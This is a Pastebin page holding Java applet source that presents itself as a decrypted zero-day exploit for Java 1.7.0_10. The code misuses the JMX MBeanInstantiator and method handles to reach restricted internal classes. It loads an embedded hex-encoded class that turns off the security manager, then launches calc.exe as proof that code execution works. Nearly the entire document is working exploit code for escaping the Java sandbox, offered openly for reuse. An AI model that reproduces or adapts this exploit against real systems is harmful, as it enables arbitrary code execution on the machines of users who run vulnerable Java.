Pastebin launched a little side project called VERYVIRAL.com, check it out ;-) Want more features on Pastebin? Sign Up, it's FREE!
Guest

Java 0day 1.7.0_10 decrypted source

By: a guest on Jan 10th, 2013  |  syntax: Java  |  size: 4.83 KB  |  views: 7,190  |  expires: Never
download  |  raw  |  embed  |  report abuse  |  print
Text below is selected. Please press Ctrl+C to copy to your clipboard. (⌘+C on Mac)
  1. /*
  2. Java 0day 1.7.0_10 decrypted source
  3. Originaly placed on https://damagelab.org/index.php?showtopic=23719&st=0
  4. From Russia with love.
  5. */
  6.  
  7. import java.applet.Applet;
  8.  
  9. import com.sun.jmx.mbeanserver.JmxMBeanServer;
  10.  
  11. import com.sun.jmx.mbeanserver.JmxMBeanServerBuilder;
  12.  
  13. import com.sun.jmx.mbeanserver.MBeanInstantiator;
  14.  
  15. import java.lang.invoke.MethodHandle;
  16.  
  17. import java.lang.invoke.MethodHandles;
  18.  
  19. import java.lang.invoke.MethodType;
  20.  
  21. import java.lang.reflect.Method;
  22.  
  23.  
  24.  
  25.  
  26.  
  27. public byte[] hex2Byte(String paramString)
  28.  
  29. {
  30.  
  31.     byte[] arrayOfByte = new byte[paramString.length() / 2];
  32.  
  33.     for (int i = 0; i < arrayOfByte.length; i++)
  34.  
  35.     {
  36.  
  37.       arrayOfByte[i] = (byte)Integer.parseInt(paramString.substring(2 * i, 2 * i + 2), 16);
  38.  
  39.     }
  40.  
  41.  
  42.  
  43.     return arrayOfByte;
  44.  
  45.  }
  46.  
  47. public static String ByteArrayWithSecOff = & #34;CAFEBABE0000003200270A000500180A0019001A07001B0A001C001D07001E07001F07002001
  48.  00063C696E69743E010003282956010004436F646501000F4C696E654E756D6265725461626C6501
  49.  00124C6F63616C5661726961626C655461626C65010001650100154C6A6176612F6C616E672F4578
  50.  63657074696F6E3B010004746869730100034C423B01000D537461636B4D61705461626C6507001F
  51.  07001B01000372756E01001428294C6A6176612F6C616E672F4F626A6563743B01000A536F757263
  52.  6546696C65010006422E6A6176610C000800090700210C002200230100136A6176612F6C616E672F
  53.  457863657074696F6E0700240C002500260100106A6176612F6C616E672F4F626A65637401000142
  54.  0100276A6176612F73656375726974792F50726976696C65676564457863657074696F6E41637469
  55.  6F6E01001E6A6176612F73656375726974792F416363657373436F6E74726F6C6C657201000C646F
  56.  50726976696C6567656401003D284C6A6176612F73656375726974792F50726976696C6567656445
  57.  7863657074696F6E416374696F6E3B294C6A6176612F6C616E672F4F626A6563743B0100106A6176
  58.  612F6C616E672F53797374656D01001273657453656375726974794D616E6167657201001E284C6A
  59.  6176612F6C616E672F53656375726974794D616E616765723B295600210006000500010007000000
  60.  020001000800090001000A0000006C000100020000000E2AB700012AB8000257A700044CB1000100
  61.  040009000C00030003000B000000120004000000080004000B0009000C000D000D000C0000001600
  62.  02000D0000000D000E00010000000E000F001000000011000000100002FF000C0001070012000107
  63.  0013000001001400150001000A0000003A000200010000000C01B80004BB000559B70001B0000000
  64.  02000B0000000A00020000001000040011000C0000000C00010000000C000F001000000001001600
  65. 0000020017";
  66.  
  67.  
  68.  
  69.  public void init()
  70.  
  71.  {
  72.  
  73.    try
  74.  
  75.    {
  76.  
  77.      
  78.  
  79.      byte[] arrayOfByte = hex2Byte(ByteArrayWithSecOff);
  80.  
  81.      JmxMBeanServerBuilder localJmxMBeanServerBuilder = new JmxMBeanServerBuilder();
  82.  
  83.      JmxMBeanServer localJmxMBeanServer = (JmxMBeanServer)localJmxMBeanServerBuilder.newMBeanServer("", null, null);
  84.  
  85.      MBeanInstantiator localMBeanInstantiator = localJmxMBeanServer.getMBeanInstantiator();
  86.  
  87.      ClassLoader a = null;
  88.  
  89.      Class localClass1 = localMBeanInstantiator.findClass("sun.org.mozilla.javascript.internal.Context", a);
  90.  
  91.      Class localClass2 = localMBeanInstantiator.findClass("sun.org.mozilla.javascript.internal.GeneratedClassLoader", a);
  92.  
  93.      MethodHandles.Lookup localLookup = MethodHandles.publicLookup();
  94.  
  95.      MethodType localMethodType1 = MethodType.methodType(MethodHandle.class, Class.class, new Class[] { MethodType.class });
  96.  
  97.      MethodHandle localMethodHandle1 = localLookup.findVirtual(MethodHandles.Lookup.class, "findConstructor", localMethodType1);
  98.  
  99.      MethodType localMethodType2 = MethodType.methodType(Void.TYPE);
  100.  
  101.      MethodHandle localMethodHandle2 = (MethodHandle)localMethodHandle1.invokeWithArguments(new Object[] { localLookup, localClass1, localMethodType2 });
  102.  
  103.      Object localObject1 = localMethodHandle2.invokeWithArguments(new Object[0]);
  104.  
  105.      MethodType localMethodType3 = MethodType.methodType(MethodHandle.class, Class.class, new Class[] { String.class, MethodType.class });
  106.  
  107.      MethodHandle localMethodHandle3 = localLookup.findVirtual(MethodHandles.Lookup.class, "findVirtual", localMethodType3);
  108.  
  109.      MethodType localMethodType4 = MethodType.methodType(localClass2, ClassLoader.class);
  110.  
  111.      MethodHandle localMethodHandle4 = (MethodHandle)localMethodHandle3.invokeWithArguments(new Object[] { localLookup, localClass1, "createClassLoader", localMethodType4 });
  112.  
  113.      Object localObject2 = localMethodHandle4.invokeWithArguments(new Object[] { localObject1, null });
  114.  
  115.      MethodType localMethodType5 = MethodType.methodType(Class.class, String.class, new Class[] { byte[].class });
  116.  
  117.      MethodHandle localMethodHandle5 = (MethodHandle)localMethodHandle3.invokeWithArguments(new Object[] { localLookup, localClass2,"defineClass", localMethodType5 });
  118.  
  119.      Class localClass3 = (Class)localMethodHandle5.invokeWithArguments(new Object[] { localObject2, null, arrayOfByte });
  120.  
  121.      localClass3.newInstance();
  122.  
  123.  
  124.  
  125.  
  126.  
  127.      Runtime.getRuntime().exec("calc.exe");
  128.  
  129.  
  130.  
  131.    }  
  132.  
  133.    catch (Throwable ex) {}
  134.  
  135.  }
  136.  
  137. }